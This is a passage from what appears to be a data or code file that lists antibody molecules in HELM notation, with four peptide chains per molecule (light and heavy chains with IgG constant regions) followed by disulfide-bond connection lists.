# .K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S
# .W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G
# .T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A
# .P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H
# .E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V
# .L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q
# .P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V
# .E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R
# .W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE3{E
# .V.Q.L.L.E.S.G.G.G.L.V.Q.P.G.G.S.L.R.L.S.C.A.A.S.G.F.T.F.S.N.A.W.M.S.W.V.R
# .Q.A.P.G.K.G.L.E.W.V.S.S.I.S.V.G.G.H.R.T.Y.Y.A.D.S.V.K.G.R.S.T.I.S.R.D.N.S
# .K.N.T.L.Y.L.Q.M.N.S.L.R.A.E.D.T.A.V.Y.Y.C.A.R.I.R.V.G.P.S.G.G.A.F.D.Y.W.G
# .Q.G.T.L.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L
# .V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L
# .S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.S
# .C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T
# .P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E
# .E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A
# .P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C
# .L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F
# .F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L
# .S.L.S.P.G.K}|PEPTIDE4{Q.S.V.L.T.Q.P.P.S.A.S.G.T.P.G.Q.R.V.T.I.S.C.S.G.S.N
# .T.N.I.G.K.N.Y.V.S.W.Y.Q.Q.L.P.G.T.A.P.K.L.L.I.Y.A.N.S.N.R.P.S.G.V.P.D.R.F
# .S.G.S.K.S.G.T.S.A.S.L.A.I.S.G.L.R.S.E.D.E.A.D.Y.Y.C.A.S.W.D.A.S.L.N.G.W.V
# .F.G.G.G.T.K.L.T.V.L.G.Q.P.K.A.A.P.S.V.T.L.F.P.P.S.S.E.E.L.Q.A.N.K.A.T.L.V
# .C.L.I.S.D.F.Y.P.G.A.V.T.V.A.W.K.A.D.S.S.P.V.K.A.G.V.E.T.T.T.P.S.K.Q.S.N.N
# .K.Y.A.A.S.S.Y.L.S.L.T.P.E.Q.W.K.S.H.R.S.Y.S.C.Q.V.T.H.E.G.S.T.V.E.K.T.V.A
# .P.T.E.C.S}$PEPTIDE3,PEPTIDE4,224:R3-215:R3|PEPTIDE3,PEPTIDE3,265:R3-325:R
# 3|PEPTIDE4,PEPTIDE4,22:R3-89:R3|PEPTIDE3,PEPTIDE3,22:R3-96:R3|PEPTIDE2,PEP
# TIDE3,233:R3-233:R3|PEPTIDE1,PEPTIDE1,22:R3-89:R3|PEPTIDE2,PEPTIDE2,22:R3-
# 96:R3|PEPTIDE1,PEPTIDE1,138:R3-197:R3|PEPTIDE2,PEPTIDE2,148:R3-204:R3|PEPT
# IDE4,PEPTIDE4,138:R3-197:R3|PEPTIDE3,PEPTIDE3,148:R3-204:R3|PEPTIDE2,PEPTI
# DE2,265:R3-325:R3|PEPTIDE2,PEPTIDE2,371:R3-429:R3|PEPTIDE3,PEPTIDE3,371:R3
# -429:R3|PEPTIDE2,PEPTIDE1,224:R3-215:R3|PEPTIDE2,PEPTIDE3,230:R3-230:R3$$$
# ' , 'PEPTIDE1{S.S.E.L.T.Q.D.P.A.V.S.V.A.L.G.Q.T.V.R.I.T.C.Q.G.D.S.L.R.S.Y.
# Y.A.S.W.Y.Q.Q.K.P.G.Q.A.P.V.L.V.I.Y.G.K.N.N.R.P.S.G.I.P.D.R.F.S.G.S.S.S.G.
# N.T.A.S.L.T.I.T.G.A.Q.A.E.D.E.A.D.Y.Y.C.N.S.R.D.S.S.G.N.H.V.V.F.G.G.G.T.K.
# L.T.V.L.G.Q.P.K.A.A.P.S.V.T.L.F.P.P.S.S.E.E.L.Q.A.N.K.A.T.L.V.C.L.I.S.D.F.
# Y.P.G.A.V.T.V.A.W.K.A.D.S.S.P.V.K.A.G.V.E.T.T.T.P.S.K.Q.S.N.N.K.Y.A.A.S.S.
# Y.L.S.L.T.P.E.Q.W.K.S.H.R.S.Y.S.C.Q.V.T.H.E.G.S.T.V.E.K.T.V.A.P.T.E.C.S}|P
# EPTIDE2{E.V.Q.L.V.Q.S.G.G.G.V.E.R.P.G.G.S.L.R.L.S.C.A.A.S.G.F.T.F.D.D.Y.G.
# M.S.W.V.R.Q.A.P.G.K.G.L.E.W.V.S.G.I.N.W.N.G.G.S.T.G.Y.A.D.S.V.K.G.R.V.T.I.
# S.R.D.N.A.K.N.S.L.Y.L.Q.M.N.S.L.R.A.E.D.T.A.V.Y.Y.C.A.K.I.L.G.A.G.R.G.W.Y.
# F.D.L.W.G.K.G.T.T.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.
# A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.
# G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.R.
# V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.
# M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.
# T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.
# K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.E.E.M.T.K.N.Q.
# V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.
# S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.
# T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE3{E.V.Q.L.V.Q.S.G.G.G.V.E.R.P.G.G.S.L.R.L.S.
# C.A.A.S.G.F.T.F.D.D.Y.G.M.S.W.V.R.Q.A.P.G.K.G.L.E.W.V.S.G.I.N.W.N.G.G.S.T.
# G.Y.A.D.S.V.K.G.R.V.T.I.S.R.D.N.A.K.N.S.L.Y.L.Q.M.N.S.L.R.A.E.D.T.A.V.Y.Y.
# C.A.K.I.L.G.A.G.R.G.W.Y.F.D.L.W.G.K.G.T.T.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.
# A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.
# G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.
# N.H.K.P.S.N.T.K.V.D.K.R.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.
# V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.
# W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.
# L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.
# L.P.P.S.R.E.E.M.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.
# E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.
# C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE4{S.S.E.L.T.Q.D.P.A.
# V.S.V.A.L.G.Q.T.V.R.I.T.C.Q.G.D.S.L.R.S.Y.Y.A.S.W.Y.Q.Q.K.P.G.Q.A.P.V.L.V.
# I.Y.G.K.N.N.R.P.S.G.I.P.D.R.F.S.G.S.S.S.G.N.T.A.S.L.T.I.T.G.A.Q.A.E.D.E.A.
# D.Y.Y.C.N.S.R.D.S.S.G.N.H.V.V.F.G.G.G.T.K.L.T.V.L.G.Q.P.K.A.A.P.S.V.T.L.F.
# P.P.S.S.E.E.L.Q.A.N.K.A.T.L.V.C.L.I.S.D.F.Y.P.G.A.V.T.V.A.W.K.A.D.S.S.P.V.
# K.A.G.V.E.T.T.T.P.S.K.Q.S.N.N.K.Y.A.A.S.S.Y.L.S.L.T.P.E.Q.W.K.S.H.R.S.Y.S.
# C.Q.V.T.H.E.G.S.T.V.E.K.T.V.A.P.T.E.C.S}$PEPTIDE4,PEPTIDE4,22:R3-87:R3|PEP
# TIDE3,PEPTIDE3,148:R3-204:R3|PEPTIDE2,PEPTIDE3,230:R3-230:R3|PEPTIDE2,PEPT
# IDE2,148:R3-204:R3|PEPTIDE4,PEPTIDE4,136:R3-195:R3|PEPTIDE3,PEPTIDE4,224:R
# 3-213:R3|PEPTIDE2,PEPTIDE2,22:R3-96:R3|PEPTIDE1,PEPTIDE1,22:R3-87:R3|PEPTI
# DE3,PEPTIDE3,265:R3-325:R3|PEPTIDE2,PEPTIDE1,224:R3-213:R3|PEPTIDE3,PEPTID
# E3,22:R3-96:R3|PEPTIDE2,PEPTIDE2,371:R3-429:R3|PEPTIDE1,PEPTIDE1,136:R3-19
# 5:R3|PEPTIDE2,PEPTIDE2,265:R3-325:R3|PEPTIDE3,PEPTIDE3,371:R3-429:R3|PEPTI
# DE2,PEPTIDE3,233:R3-233:R3$$$' , 'PEPTIDE1{S.S.E.L.T.Q.D.P.A.V.S.V.A.L.G.Q
# .T.V.R.I.T.C.Q.G.D.S.L.R.S.Y.Y.A.T.W.Y.Q.Q.K.P.G.Q.A.P.I.L.V.I.Y.G.E.N.K.R
# .P.S.G.I.P.D.R.F.S.G.S.S.S.G.N.T.A.S.L.T.I.T.G.A.Q.A.E.D.E.A.D.Y.Y.C.K.S.R
# .D.G.S.G.Q.H.L.V.F.G.G.G.T.K.L.T.V.L.G.Q.P.K.A.A.P.S.V.T.L.F.P.P.S.S.E.E.L
# .Q.A.N.K.A.T.L.V.C.L.I.S.D.F.Y.P.G.A.V.T.V.A.W.K.A.D.S.S.P.V.K.A.G.V.E.T.T
# .T.P.S.K.Q.S.N.N.K.Y.A.A.S.S.Y.L.S.L.T.P.E.Q.W.K.S.H.R.S.Y.S.C.Q.V.T.H.E.G
# .S.T.V.E.K.T.V.A.P.A.E.C.S}|PEPTIDE2{E.V.Q.L.V.Q.S.G.A.E.V.K.K.P.G.S.S.V.K
# .V.S.C.K.A.S.G.G.T.F.S.S.Y.A.I.S.W.V.R.Q.A.P.G.Q.G.L.E.W.M.G.G.I.I.P.I.F.G
# .T.A.N.Y.A.Q.K.F.Q.G.R.V.T.I.T.A.D.K.S.T.S.T.A.Y.M.E.L.S.S.L.R.S.E.D.T.A.V
# .Y.Y.C.A.R.A.P.L.R.F.L.E.W.S.T.Q.D.H.Y.Y.Y.Y.Y.M.D.V.W.G.K.G.T.T.V.T.V.S.S
# .A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V
# .T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S
# .S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P
# .C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D
# .V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V
# .V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A
# .K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.E.E.M.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D
# .I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D
# .K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPT
# IDE3{E.V.Q.L.V.Q.S.G.A.E.V.K.K.P.G.S.S.V.K.V.S.C.K.A.S.G.G.T.F.S.S.Y.A.I.S
# .W.V.R.Q.A.P.G.Q.G.L.E.W.M.G.G.I.I.P.I.F.G.T.A.N.Y.A.Q.K.F.Q.G.R.V.T.I.T.A
# .D.K.S.T.S.T.A.Y.M.E.L.S.S.L.R.S.E.D.T.A.V.Y.Y.C.A.R.A.P.L.R.F.L.E.W.S.T.Q
# .D.H.Y.Y.Y.Y.Y.M.D.V.W.G.K.G.T.T.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K
# .S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F
# .P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S
# .N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P
# .P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G
# .V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E
# .Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R
# .E.E.M.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K
# .T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H
# .E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE4{S.S.E.L.T.Q.D.P.A.V.S.V.A.L
# .G.Q.T.V.R.I.T.C.Q.G.D.S.L.R.S.Y.Y.A.T.W.Y.Q.Q.K.P.G.Q.A.P.I.L.V.I.Y.G.E.N
# .K.R.P.S.G.I.P.D.R.F.S.G.S.S.S.G.N.T.A.S.L.T.I.T.G.A.Q.A.E.D.E.A.D.Y.Y.C.K
# .S.R.D.G.S.G.Q.H.L.V.F.G.G.G.T.K.L.T.V.L.G.Q.P.K.A.A.P.S.V.T.L.F.P.P.S.S.E
# .E.L.Q.A.N.K.A.T.L.V.C.L.I.S.D.F.Y.P.G.A.V.T.V.A.W.K.A.D.S.S.P.V.K.A.G.V.E
# .T.T.T.P.S.K.Q.S.N.N.K.Y.A.A.S.S.Y.L.S.L.T.P.E.Q.W.K.S.H.R.S.Y.S.C.Q.V.T.H
# .E.G.S.T.V.E.K.T.V.A.P.A.E.C.S}$PEPTIDE2,PEPTIDE1,233:R3-213:R3|PEPTIDE3,P
# EPTIDE3,157:R3-213:R3|PEPTIDE2,PEPTIDE2,380:R3-438:R3|PEPTIDE2,PEPTIDE3,23
# 9:R3-239:R3|PEPTIDE3,PEPTIDE3,22:R3-96:R3|PEPTIDE4,PEPTIDE4,136:R3-195:R3|
# PEPTIDE2,PEPTIDE3,242:R3-242:R3|PEPTIDE3,PEPTIDE3,380:R3-438:R3|PEPTIDE2,P
# EPTIDE2,22:R3-96:R3|PEPTIDE1,PEPTIDE1,136:R3-195:R3|PEPTIDE3,PEPTIDE4,233:
# R3-213:R3|PEPTIDE2,PEPTIDE2,157:R3-213:R3|PEPTIDE3,PEPTIDE3,274:R3-334:R3|
# PEPTIDE1,PEPTIDE1,22:R3-87:R3|PEPTIDE2,PEPTIDE2,274:R3-334:R3|PEPTIDE4,PEP
# TIDE4,22:R3-87:R3$$$' , 'PEPTIDE1{D.I.V.M.T.Q.S.Q.R.F.M.S.T.T.V.G.D.R.V.S.
# I.T.C.K.A.S.Q.N.V.V.S.A.V.A.W.Y.Q.Q.K.P.G.Q.S.P.K.L.L.I.Y.S.A.S.N.R.Y.T.G.
# V.P.D.R.F.T.G.S.G.S.G.T.D.F.T.L.T.I.S.N.M.Q.S.E.D.L.A.D.F.F.C.Q.Q.Y.S.N.Y.
# P.W.T.F.G.G.G.T.K.L.E.I.K.R.T.V.A.A.P.S.V.F.I.F.P.P.S.D.E.Q.L.K.S.G.T.A.S.
# V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.
# K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.V.
# T.K.S.F.N.R.G.E.C}|PEPTIDE2{D.V.K.L.V.E.S.G.G.G.L.V.K.L.G.G.S.L.K.L.S.C.A.
# A.S.G.F.T.F.S.N.Y.Y.M.S.W.V.R.Q.T.P.E.K.R.L.E.L.V.A.A.I.N.S.D.G.G.I.T.Y.Y.
# L.D.T.V.K.G.R.F.T.I.S.R.D.N.A.K.N.T.L.Y.L.Q.M.S.S.L.K.S.E.D.T.A.L.F.Y.C.A.
# R.H.R.S.G.Y.F.S.M.D.Y.W.G.Q.G.T.S.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.
# K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.
# F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.
# S.N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.
# P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.
# G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.
# E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.
# R.D.E.L.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.
# K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.
# H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE3{D.V.K.L.V.E.S.G.G.G.L.V.K.
# L.G.G.S.L.K.L.S.C.A.A.S.G.F.T.F.S.N.Y.Y.M.S.W.V.R.Q.T.P.E.K.R.L.E.L.V.A.A.
# I.N.S.D.G.G.I.T.Y.Y.L.D.T.V.K.G.R.F.T.I.S.R.D.N.A.K.N.T.L.Y.L.Q.M.S.S.L.K.
# S.E.D.T.A.L.F.Y.C.A.R.H.R.S.G.Y.F.S.M.D.Y.W.G.Q.G.T.S.V.T.V.S.S.A.S.T.K.G.
# P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.
# S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.
# T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.
# L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.
# P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.
# V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.
# E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.
# E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.
# Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE4{D.I.V.
# M.T.Q.S.Q.R.F.M.S.T.T.V.G.D.R.V.S.I.T.C.K.A.S.Q.N.V.V.S.A.V.A.W.Y.Q.Q.K.P.
# G.Q.S.P.K.L.L.I.Y.S.A.S.N.R.Y.T.G.V.P.D.R.F.T.G.S.G.S.G.T.D.F.T.L.T.I.S.N.
# M.Q.S.E.D.L.A.D.F.F.C.Q.Q.Y.S.N.Y.P.W.T.F.G.G.G.T.K.L.E.I.K.R.T.V.A.A.P.S.
# V.F.I.F.P.P.S.D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.
# N.A.L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.
# H.K.V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.G.E.C}$PEPTIDE3,PEPTIDE4,222
# :R3-214:R3|PEPTIDE4,PEPTIDE4,134:R3-194:R3|PEPTIDE1,PEPTIDE1,134:R3-194:R3
# |PEPTIDE3,PEPTIDE3,22:R3-96:R3|PEPTIDE2,PEPTIDE2,146:R3-202:R3|PEPTIDE2,PE
# PTIDE1,222:R3-214:R3|PEPTIDE2,PEPTIDE2,369:R3-427:R3|PEPTIDE3,PEPTIDE3,263
# :R3-323:R3|PEPTIDE2,PEPTIDE2,263:R3-323:R3|PEPTIDE4,PEPTIDE4,23:R3-88:R3|P
# EPTIDE1,PEPTIDE1,23:R3-88:R3|PEPTIDE2,PEPTIDE3,231:R3-231:R3|PEPTIDE3,PEPT
# IDE3,369:R3-427:R3|PEPTIDE2,PEPTIDE2,22:R3-96:R3|PEPTIDE3,PEPTIDE3,146:R3-
# 202:R3|PEPTIDE2,PEPTIDE3,228:R3-228:R3$$$' , 'PEPTIDE1{D.I.Q.M.T.Q.S.P.S.S
# .V.S.A.S.I.G.D.R.V.T.I.T.C.R.A.S.Q.G.I.D.N.W.L.G.W.Y.Q.Q.K.P.G.K.A.P.K.L.L
# .I.Y.D.A.S.N.L.D.T.G.V.P.S.R.F.S.G.S.G.S.G.T.Y.F.T.L.T.I.S.S.L.Q.A.E.D.F.A
# .V.Y.F.C.Q.Q.A.K.A.F.P.P.T.F.G.G.G.T.K.V.D.I.K.G.T.V.A.A.P.S.V.F.I.F.P.P.S
# .D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.L.Q.S.G.N
# .S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.V.Y.A.C.E
# .V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.G.E.C}|PEPTIDE2{E.V.Q.L.V.Q.S.G.G.G.L.V.K
# .P.G.G.S.L.R.L.S.C.A.A.S.G.F.T.F.S.S.Y.S.M.N.W.V.R.Q.A.P.G.K.G.L.E.W.V.S.S
# .I.S.S.S.S.S.Y.I.Y.Y.A.D.S.V.K.G.R.F.T.I.S.R.D.N.A.K.N.S.L.Y.L.Q.M.N.S.L.R
# .A.E.D.T.A.V.Y.Y.C.A.R.V.T.D.A.F.D.I.W.G.Q.G.T.M.V.T.V.S.S.A.S.T.K.G.P.S.V
# .F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A
# .L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I
# .C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G
# .G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V
# .K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H
# .Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q
# .V.Y.T.L.P.P.S.R.E.E.M.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N
# .G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N
# .V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE3{E.V.Q.L.V.Q
# .S.G.G.G.L.V.K.P.G.G.S.L.R.L.S.C.A.A.S.G.F.T.F.S.S.Y.S.M.N.W.V.R.Q.A.P.G.K
# .G.L.E.W.V.S.S.I.S.S.S.S.S.Y.I.Y.Y.A.D.S.V.K.G.R.F.T.I.S.R.D.N.A.K.N.S.L.Y
# .L.Q.M.N.S.L.R.A.E.D.T.A.V.Y.Y.C.A.R.V.T.D.A.F.D.I.W.G.Q.G.T.M.V.T.V.S.S.A
# .S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T
# .V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S
# .L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C
# .P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V
# .S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V
# .S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K
# .G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.E.E.M.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I
